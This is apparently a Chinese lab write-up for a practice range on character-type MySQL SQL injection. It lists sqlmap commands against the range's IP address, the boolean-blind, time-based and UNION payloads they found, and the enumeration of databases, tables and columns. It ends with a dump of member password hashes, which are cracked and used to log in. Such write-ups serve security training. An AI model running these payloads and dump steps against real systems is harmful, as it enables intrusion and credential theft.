SQL手工注入漏洞测试(MySQL数据库-字符型)
一、漏洞假设
1、首先是应该遍历所有的URL
(一开始漏掉第二个URL导致STUCK)
2、URL1是POST注入
3、URL2是GET注入
根据提示漏洞点在URL2
二、漏洞探测
探测思路:
1、使用sqlmap(优先)
2、手工注入
#探测是否有漏洞
sqlmap -u "http://124.70.91.203:40995/new_list.php?id=tingjigonggao" -o --batch
#-o为优化性能
#--batch为默认
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=tingjigonggao' AND 2478=2478 AND 'hRkp'='hRkp
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=tingjigonggao' AND (SELECT 4528 FROM (SELECT(SLEEP(5)))CUeE) AND 'gDuR'='gDuR
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=-4314' UNION ALL SELECT NULL,NULL,CONCAT(0x7171626271,0x69796a61554c7961684f426c4a77437850475565696958776d544e4e7549794a68476e6d4e677162,0x716b707171),NULL-- -
[09:32:54] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.6.37
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
#根据sqlmap的探测可以知道sql注入的类型为
#GET 字符型 单引号
#布尔盲注 时间盲注 联合查询
#脱裤
sqlmap -u "http://124.70.91.203:40995/new_list.php?id=tingjigonggao" -o -batch -a
#-a 脱裤所有 不建议直接使用
#当期数据库
sqlmap -u "http://124.70.91.203:40995/new_list.php?id=tingjigonggao" -o --batch --current-db
#current database: 'mozhe_discuz_stormgroup'
#所有数据库
sqlmap -u "http://124.70.91.203:40995/new_list.php?id=tingjigonggao" -o --batch --dbs
# available databases[5]
# [*] information_schema
# [*] mozhe_discuz_stormgroup
# [*] mysql
# [*] performance_schema
# [*] test
#当期数据库的所有表
sqlmap -u "http://124.70.91.203:40995/new_list.php?id=tingjigonggao" -o --batch -D 'mozhe_discuz_stormgroup' --tables
# Database: mozhe_discuz_stormgroup
# [2 tables]
# +-------------------+
# | notice |
# | stormgroup_member |
# +-------------------+
#当期数据库的某表的字段
sqlmap -u "http://124.70.91.203:40995/new_list.php?id=tingjigonggao" -o --batch -D 'mozhe_discuz_stormgroup' -T 'stormgroup_member' --columns
# Database: mozhe_discuz_stormgroup
# Table: stormgroup_member
# [4 columns]
# +----------+--------------+
# | Column | Type |
# +----------+--------------+
# | name | varchar(20) |
# | status | int(11) |
# | id | int(11) |
# | password | varchar(255) |
# +----------+--------------+
#当期数据库的某表的内容
sqlmap -u "http://124.70.91.203:40995/new_list.php?id=tingjigonggao" -o --batch -D 'mozhe_discuz_stormgroup' -T 'stormgroup_member' --dump
# Database: mozhe_discuz_stormgroup
# Table: stormgroup_member
# [2 entries]
# +----+--------+----------+----------------------------------+
# | id | name | status | password |
# +----+--------+----------+----------------------------------+
# | 2 | mozhe | 0 | 356f589a7df439f6f744ff19bb8092c0 |
# | 1 | mozhe | 1 | 22b618b90f098a0e180ace5c992566a8 |
# +----+--------+----------+----------------------------------+
mozhe 356f589a7df439f6f744ff19bb8092c0
mozhe 22b618b90f098a0e180ace5c992566a8
推测为md5值,使用cmd5解密得出
mozhe dsan13
mozhe 883073
使用第二个口令成功登录
三、漏洞总结
1、靶场SQL注入类型
#GET 字符型 单引号
#布尔盲注 时间盲注 联合查询
2、对页面需进行全面的URL收集,即可注入点的收集
3、优先使用sqlmap进行,手工注入方法请参考sql-lab的博客